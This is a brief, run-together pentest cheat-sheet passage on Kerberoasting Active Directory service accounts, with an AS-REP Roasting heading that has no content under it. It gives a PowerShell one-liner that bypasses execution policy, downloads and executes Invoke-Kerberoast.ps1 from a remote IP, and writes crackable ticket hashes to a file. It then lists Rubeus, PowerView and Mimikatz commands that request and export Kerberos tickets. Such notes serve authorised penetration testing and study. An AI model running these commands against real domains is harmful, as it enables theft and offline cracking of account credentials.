Roasting
Kerberoasting
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.49.121/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"Get-NetUser -SPN | select cnRequest-SPNTicketRubeus.exe kerberoast /format:hashcat > Hash1kerberos::ask /target:SPN
kerberos::list /exportkerberos::list
kerberos::list /exportAS-Rep Roasting
Last updated